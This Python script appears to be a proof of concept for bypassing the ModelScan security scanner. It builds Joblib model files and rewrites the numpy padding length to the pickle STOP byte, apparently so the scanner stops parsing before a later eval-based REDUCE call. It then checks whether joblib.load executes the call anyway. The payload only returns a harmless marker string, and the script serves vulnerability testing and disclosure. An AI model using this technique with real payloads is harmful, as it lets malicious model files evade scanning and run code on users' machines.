modelscan-joblib-numpy-padding-bypass-poc / joblib_numpy_padding_probe.py
katsuiy
Add ModelScan Joblib padding PoC
9d04701
#!/usr/bin/env python3
"""Generate benign Joblib artifacts for numpy padding traversal checks."""
from __future__ import annotations
import argparse
import io
import json
import os
import pathlib
import pickletools
import re
import shutil
import subprocess
from dataclasses import dataclass
from typing import Any
import joblib
import numpy as np
MARKER = "BENIGN_JOBLIB_MARKER"
PICKLE_STOP = 0x2E
JOBLIB_PADDING_BYTE = b"\xff"
PICKLE_PROTOCOL = 4
class BenignEval:
"""Benign unsafe-global marker: eval returns a constant string only."""
def __reduce__(self) -> tuple[Any, tuple[str]]:
return (eval, (repr(MARKER),))
@dataclass(frozen=True)
class PaddingPatch:
offset: int
original_length: int
patched_length: int
inserted_bytes: int
array_data_offset_before: int
array_data_offset_after: int
def dump_joblib_bytes(value: Any) -> bytes:
buffer = io.BytesIO()
joblib.dump(value, buffer, compress=0, protocol=PICKLE_PROTOCOL)
return buffer.getvalue()
def find_first_numpy_padding(data: bytes) -> int:
ops: list[tuple[int, str]] = []
try:
for opcode, _arg, pos in pickletools.genops(data):
ops.append((pos, opcode.name))
except ValueError as exc:
match = re.search(r"position (\d+)", str(exc))
if not match:
raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc
offset = int(match.group(1))
if not ops or ops[-1][1] != "BUILD":
raise RuntimeError(
"pickle parsing did not stop immediately after a numpy wrapper BUILD"
)
if b"numpy_array_alignment_bytes" not in data[:offset]:
raise RuntimeError("joblib numpy alignment metadata was not found")
return offset
raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing")
def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]:
offset = find_first_numpy_padding(data)
original_length = data[offset]
if not 1 <= original_length <= 64:
raise RuntimeError(f"unexpected joblib padding length: {original_length}")
if original_length >= PICKLE_STOP:
raise RuntimeError(
f"padding length {original_length} does not need a STOP-byte expansion"
)
inserted = PICKLE_STOP - original_length
patched = (
data[:offset]
+ bytes([PICKLE_STOP])
+ (JOBLIB_PADDING_BYTE * inserted)
+ data[offset + 1 :]
)
patch = PaddingPatch(
offset=offset,
original_length=original_length,
patched_length=PICKLE_STOP,
inserted_bytes=inserted,
array_data_offset_before=offset + 1 + original_length,
array_data_offset_after=offset + 1 + PICKLE_STOP,
)
return patched, patch
def write_bytes(path: pathlib.Path, data: bytes) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
path.write_bytes(data)
def load_status(path: pathlib.Path) -> dict[str, Any]:
try:
value = joblib.load(path)
except Exception as exc:
return {
"status": "error",
"error": f"{type(exc).__name__}: {str(exc).splitlines()[0]}",
}
return {
"status": "ok",
"type": type(value).__name__,
"repr": repr(value),
"marker_found": contains_marker(value),
}
def contains_marker(value: Any) -> bool:
if isinstance(value, str):
return value == MARKER
if isinstance(value, np.ndarray):
return False
if isinstance(value, (bytes, bytearray, memoryview)):
return False
if value is None:
return False
if isinstance(value, (bool, int, float, complex)):
return False
if isinstance(value, dict):
return any(contains_marker(item) for item in value.values())
if isinstance(value, (list, tuple)):
return any(contains_marker(item) for item in value)
return False
def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]:
positions: list[int] = []
for opcode, _arg, pos in pickletools.genops(data[start:]):
if opcode.name == opcode_name:
positions.append(start + pos)
return positions
def opcode_offsets(data: bytes) -> dict[str, int | None]:
offsets: dict[str, int | None] = {
"builtins_string": find_bytes(data, b"builtins"),
"eval_string": find_bytes(data, b"eval"),
"marker_string": find_bytes(data, MARKER.encode()),
"final_stop_opcode": data.rfind(bytes([PICKLE_STOP])),
}
return offsets
def find_bytes(data: bytes, needle: bytes) -> int | None:
offset = data.find(needle)
return offset if offset >= 0 else None
def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]:
if command is None:
return {"status": "skipped"}
if not command.exists():
return {"status": "missing", "command": str(command)}
completed = subprocess.run(
[
str(command),
"-p",
str(path),
"-r",
"json",
"--show-skipped",
],
text=True,
capture_output=True,
env={**os.environ, "COLUMNS": "20000"},
check=False,
)
stdout = completed.stdout.strip()
json_start = stdout.find("{")
parsed: dict[str, Any]
if json_start >= 0:
try:
parsed = json.loads(stdout[json_start:])
except json.JSONDecodeError:
parsed = {"parse_error": stdout}
else:
parsed = {"parse_error": stdout}
summary = parsed.get("summary") if isinstance(parsed, dict) else None
return {
"status": "ok" if "parse_error" not in parsed else "parse_error",
"returncode": completed.returncode,
"modelscan_version": summary.get("modelscan_version") if summary else None,
"total_issues": summary.get("total_issues") if summary else None,
"errors": parsed.get("errors") if isinstance(parsed, dict) else None,
}
def summarize(
case: str,
path: pathlib.Path,
modelscan_command: pathlib.Path | None,
extra_offsets: dict[str, Any] | None = None,
) -> dict[str, Any]:
data = path.read_bytes()
offsets: dict[str, Any] = opcode_offsets(data)
if extra_offsets:
offsets.update(extra_offsets)
return {
"case": case,
"path": str(path),
"size": len(data),
"joblib_load": load_status(path),
"offsets": offsets,
"modelscan": modelscan(path, modelscan_command),
}
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument(
"output_dir",
nargs="?",
type=pathlib.Path,
default=pathlib.Path("corpus/joblib_numpy_padding_probe"),
)
parser.add_argument(
"--modelscan-command",
type=pathlib.Path,
default=None,
)
parser.add_argument("--skip-modelscan", action="store_true")
args = parser.parse_args()
modelscan_command = None if args.skip_modelscan else resolve_modelscan_command(
args.modelscan_command
)
control_path = args.output_dir / "control_direct.joblib"
candidate_path = args.output_dir / "candidate_numpy_array_then_payload_patched.joblib"
control_bytes = dump_joblib_bytes(BenignEval())
write_bytes(control_path, control_bytes)
array = np.array([PICKLE_STOP, 0, 1, 2, 3, 4, 5, 6], dtype=np.uint8)
candidate_bytes = dump_joblib_bytes([array, BenignEval()])
patched_candidate_bytes, patch = patch_padding_to_stop(candidate_bytes)
write_bytes(candidate_path, patched_candidate_bytes)
print(
json.dumps(
summarize(
"control_direct",
control_path,
modelscan_command,
{
"payload_reduce_opcode_offsets": opcode_positions(
control_bytes,
"REDUCE",
)
},
),
sort_keys=True,
)
)
payload_frame_offset = patch.array_data_offset_after + array.nbytes
print(
json.dumps(
summarize(
"candidate_numpy_array_then_payload_patched",
candidate_path,
modelscan_command,
{
"padding_length_offset": patch.offset,
"padding_original_length": patch.original_length,
"padding_patched_length": patch.patched_length,
"padding_inserted_bytes": patch.inserted_bytes,
"array_data_offset_before_patch": patch.array_data_offset_before,
"array_data_offset_after_patch": patch.array_data_offset_after,
"array_first_byte_after_patch": patched_candidate_bytes[
patch.array_data_offset_after
],
"payload_frame_offset_after_patch": payload_frame_offset,
"payload_reduce_opcode_offsets_after_patch": opcode_positions(
patched_candidate_bytes,
"REDUCE",
payload_frame_offset,
),
},
),
sort_keys=True,
)
)
return 0
def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None:
if command is not None:
return command
local_command = pathlib.Path(".venv-modelscan/bin/modelscan")
if local_command.exists():
return local_command
path_command = shutil.which("modelscan")
if path_command is not None:
return pathlib.Path(path_command)
return local_command
if __name__ == "__main__":
raise SystemExit(main())